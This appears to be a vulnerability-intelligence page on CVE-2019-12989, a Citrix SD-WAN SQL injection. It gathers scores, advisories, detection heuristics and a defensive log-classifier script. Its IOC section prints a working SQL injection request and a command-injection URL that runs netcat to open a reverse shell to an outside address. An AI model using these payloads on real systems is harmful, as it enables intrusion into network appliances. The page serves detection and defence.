CVE-2019-12989
Published 2019-07-16
Priority P1 · 95 · critical · CVSS 3.1 9.8
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CISA Known Exploited Vulnerability, due 2022-04-15
Exploited in the wild
EPSS: 94.05% (99.8th percentile)
Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 allow SQL Injection.
Affected (6 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| citrix | citrix_sd-wan | — | — |
| citrix | netscaler_adc_gateway | — | — |
| citrix | netscaler_sd-wan | >= 10.0.0 < 10.0.8 | 10.0.8 |
| citrix | sd-wan | — | — |
| citrix | sd-wan | >= 10.2.0 < 10.2.3 | 10.2.3 |
| citrix | xenserver | — | — |
Detection & IOCs (extracted from sources)
- url: `/cgi-bin/installpatch.cgi?swc-token=01234&installfile=`sudo%20nc%20-nv%20192.168.1.191%204444%20-e%20/bin/bash``
- other: fofa-query: (title="citrix sd-wan") && icon_hash="177980953"
- sigma:
```http
POST /sdwan/nitro/v1/config/get_package_file?action=file_download HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
SSL_CLIENT_VERIFY: SUCCESS

{"get_package_file": {"site_name": "test' union select md5({{num}}), 'x', 'y', 'z' #","appliance_type": "primary","package_type": "active"}}
```
- Look for HTTP POST requests to /sdwan/nitro/v1/config/get_package_file?action=file_download with the custom header SSL_CLIENT_VERIFY: SUCCESS; this header is required to trigger the unauthenticated SQL injection.
- Detect SQL UNION-based injection payloads in the 'site_name' JSON field of POST requests to the get_package_file endpoint, particularly payloads containing INTO OUTFILE targeting /tmp/.
- Monitor for file creation in /tmp/ matching the pattern token_[0-9]+ by the 'mysql' user, which indicates a successful SQL injection auth bypass.
- Detect GET requests to /cgi-bin/installpatch.cgi with backtick-enclosed commands in the 'installfile' parameter, indicating chained command injection (CVE-2019-12991) following the auth bypass.
- A 400 HTTP response containing both 'status:"fail"' and 'Invalid value specified' from the get_package_file endpoint is the expected server response confirming that the SQL injection was triggered.
- Monitor for execution of nc (netcat) with '-e /bin/bash' arguments spawned from the web server process, indicating reverse shell establishment post-exploitation.
- Alert on execution of user_management.pl with 'addUser' arguments from non-administrative contexts, indicating post-exploitation persistence via rogue admin account creation.
- The SQL injection is only reachable when the HTTP header SSL_CLIENT_VERIFY is set to SUCCESS. In production deployments with a properly configured TLS-terminating proxy this header may be restricted; if the appliance is directly internet-exposed, no such protection exists.
- The Nuclei detection template uses a DSL matcher that checks for both the error response body ('status:"fail"', 'Invalid value specified') and the md5 hash of a random number in the body; the second condition confirms blind data exfiltration via error messages.
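The detection heuristics above, turned into a small request classifier a defender could run over proxy or web-server logs. This is an added example, not code from the page, the Nuclei template or any vendor; the request schema (method, path, headers, body) and the sample requests are constructed for the example.

```python
import json
import re
from urllib.parse import parse_qs, urlparse

GET_PKG_PATH = "/sdwan/nitro/v1/config/get_package_file"
PATCH_PATH = "/cgi-bin/installpatch.cgi"
# UNION-based payloads and INTO OUTFILE writes, as described in the IOC notes
SQLI_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b|\binto\s+outfile\b", re.I)


def classify_request(req: dict) -> list[str]:
    """Return finding labels for one parsed request (constructed schema)."""
    findings = []
    url = urlparse(req["path"])
    if req["method"] == "POST" and url.path == GET_PKG_PATH:
        # The injection is only reachable with this header set to SUCCESS.
        if req["headers"].get("SSL_CLIENT_VERIFY", "").upper() == "SUCCESS":
            findings.append("ssl_client_verify_header")
        try:
            body = json.loads(req.get("body") or "{}")
            site = body.get("get_package_file", {}).get("site_name", "")
        except (ValueError, AttributeError):
            site = req.get("body") or ""  # malformed JSON: scan the raw body
        if SQLI_RE.search(site):
            findings.append("sqli_site_name")
    if url.path == PATCH_PATH:
        # Chained CVE-2019-12991: shell metacharacters in 'installfile'
        installfile = parse_qs(url.query).get("installfile", [""])[0]
        if "`" in installfile or "$(" in installfile:
            findings.append("cmdi_installfile")
    return findings


def scan(requests: list[dict]) -> list[tuple[int, list[str]]]:
    """Index and findings for every request that triggered at least one rule."""
    return [(i, f) for i, r in enumerate(requests) if (f := classify_request(r))]


# Constructed sample traffic: one injection attempt, one benign call, one
# chained command-injection probe with a placeholder command.
SAMPLE_REQUESTS = [
    {"method": "POST", "path": GET_PKG_PATH + "?action=file_download",
     "headers": {"SSL_CLIENT_VERIFY": "SUCCESS", "Content-Type": "application/json"},
     "body": '{"get_package_file": {"site_name": "test\' union select md5(1), \'x\', \'y\', \'z\' #", "appliance_type": "primary", "package_type": "active"}}'},
    {"method": "POST", "path": GET_PKG_PATH + "?action=file_download",
     "headers": {"Content-Type": "application/json"},
     "body": '{"get_package_file": {"site_name": "branch-01", "appliance_type": "primary", "package_type": "active"}}'},
    {"method": "GET", "path": PATCH_PATH + "?swc-token=01234&installfile=`[cmd]`",
     "headers": {}, "body": ""},
]
```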
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vulncheck | — | 9.8 | CRITICAL | — |
| cisa | — | 9.8 | CRITICAL | — |
GHSA
GHSA-9q4p-22w8-h32x: Citrix SD-WAN 10
ghsa_unreviewed·2022-05-24
CVE-2019-12989 [HIGH] CWE-89 GHSA-9q4p-22w8-h32x: Citrix SD-WAN 10
Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 allow SQL Injection.
VulnCheck
Citrix SD-WAN and NetScaler SQL Injection Vulnerability
vulncheck·2019·CVSS 9.8
CVE-2019-12989 [CRITICAL] CWE-89 Citrix SD-WAN and NetScaler SQL Injection Vulnerability
Citrix SD-WAN and NetScaler SQL Injection Vulnerability
Citrix SD-WAN and NetScaler SD-WAN allow SQL Injection.
Affected: Citrix SD-WAN and NetScaler
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.researchgate.net/publication/348602660_An_analysis_of_the_use_of_CVEs_by_IoT_malware; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://app.crowdsec.net/cti/cve-explorer/CVE-2019-12989; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-10-31&host_type=src&vulnerability=cve-2019-12989; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-11-02&host_type=src&vulnerability=cve-2019-12989; https://dashboard.shadowserver.org/statistics/honeypot/vul
CISA
Citrix SD-WAN and NetScaler SQL Injection Vulnerability
cisa·2022-03-25·CVSS 9.8
CVE-2019-12989 [CRITICAL] CWE-89 Citrix SD-WAN and NetScaler SQL Injection Vulnerability
Vulnerability: Citrix SD-WAN and NetScaler SQL Injection Vulnerability
Affected: Citrix SD-WAN and NetScaler
Citrix SD-WAN and NetScaler SD-WAN allow SQL Injection.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2019-12989
Remediation Due Date: 2022-04-15
Citrix
CVE-2019-12989: Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 allow SQL Injection.
vendor_citrix·2019-07-16·CVSS 9.8
CVE-2019-12989 [CRITICAL] CWE-89 CVE-2019-12989: Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 allow SQL Injection.
CVE-2019-12989: Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 allow SQL Injection.
CISA KEV: Citrix SD-WAN and NetScaler SD-WAN allow SQL Injection.
Required Action: Apply updates per vendor instructions.
Citrix
Citrix SD-WAN Multiple Security Updates
vendor_citrix·CVSS 9.8
CVE-2019-12985 [CRITICAL] Citrix SD-WAN Multiple Security Updates
Citrix SD-WAN Multiple Security Updates
of Problem Multiple vulnerabilities have been identified in the management console of the Citrix SD-WAN Center and NetScaler SD-WAN Center. Multiple Vulnerabilities have also been identified on the Citrix SD-WAN Appliance and NetScaler SD-WAN Appliance. Collectively, these vulnerabilities could result in an unauthenticated attacker executing commands as root against the SD-WAN Center management console, or potentially be used to gain root privileges on the SD-WAN appliance. The vulnerabilities have been assigned the following CVE numbers. CVE-2019-12985 – Unauthenticated Command Injection in Citrix SD-WAN Center 10.2.x before 10.2.3 and NetScaler SD-WAN Center 10.0.x before 10.0.8. CVE-2019-12986 – Unauthenticated Command Injection in Citrix SD-WAN
No detection rules found.
Exploit-DB
Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution
exploitdb·2019-07-12·CVSS 9.8
CVE-2019-12991 [CRITICAL] Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution
Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution
```python
# Exploit Title: Citrix SD-WAN Appliance 10.2.2 Auth Bypass and Remote Command Execution
# Date: 2019-07-12
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: https://www.citrix.com
# Product: Citrix SD-WAN
# Software Link: https://www.citrix.com/downloads/citrix-sd-wan/
# Version: Tested against 10.2.2
# Tested on:
# - Vendor-provided .OVA file
# CVE: CVE-2019-12989, CVE-2019-12991
#
# See Also:
# https://www.tenable.com/security/research/tra-2019-32
# https://medium.com/tenable-techblog/an-exploit-chain-against-citrix-sd-wan-709db08fb4ac
# https://support.citrix.com/article/CTX251987
#
# This code exploits both CVE-2019-12989 and CVE-2019-12991
# You'll need your own Netcat listener
import req
```
Nuclei
Citrix SD-WAN and NetScaler SD-WAN - SQL Injection
nuclei·CVSS 9.8
CVE-2019-12989 [CRITICAL] Citrix SD-WAN and NetScaler SD-WAN - SQL Injection
Citrix SD-WAN and NetScaler SD-WAN - SQL Injection
Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 contain an SQL injection vulnerability. An unauthenticated attacker can exploit improper validation of input in specific components, which could allow for execution of arbitrary SQL queries against the backend database. This could result in information disclosure, manipulation of data, or complete compromise of affected systems.
Template:
```yaml
id: CVE-2019-12989
info:
  name: Citrix SD-WAN and NetScaler SD-WAN - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 contain an SQL injection vulnerability. An unauthenticated attacker can exploit improper validation of input in s
```
Unit42
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
blogs_unit42·2019-12-13
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
Ruchna Nigam
Published: December 13, 2019
## Executive Summary
Since the discovery of the Mirai variant using the binary name ECHOBOT in May 2019, it has resurfaced from time to time, using new infrastructure, and more remarkably, adding to the list of vulnerabilities it scans for, as a means to increase its attack surface with each evolution.
Unlike other Mirai variants, this particular variant stands out for the sheer number of exploits it incorporates, with the latest version having a total of 71 unique exploits, 13 of which haven’t been seen exploited in the wild until now, ranging from extremely old CVEs from as long back as 2003, to recent vulnerabilities made public as recently as early December 2019. Based on this seemingly odd choice, one could risk a guess that the attackers could potentially be aiming for the sweet sp
Tenable
Multiple Vulnerabilities Found in Citrix SD-WAN Center and SD-WAN Appliances
blogs_tenable·2019-07-11
Multiple Vulnerabilities Found in Citrix SD-WAN Center and SD-WAN Appliances
Tenable
Citrix SD-WAN Appliance Multiple Vulnerabilities
blogs_tenable·2019-07-02
Citrix SD-WAN Appliance Multiple Vulnerabilities
References
- http://packetstormsecurity.com/files/153638/Citrix-SD-WAN-Appliance-10.2.2-Authentication-Bypass-Remote-Command-Execution.html
- http://www.securityfocus.com/bid/109133
- https://support.citrix.com/article/CTX251987
- https://www.tenable.com/security/research/tra-2019-32
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-12989

Timeline
- 2019-07-16: Published
- 2022-03-25: Added to CISA KEV
- Exploited in the wild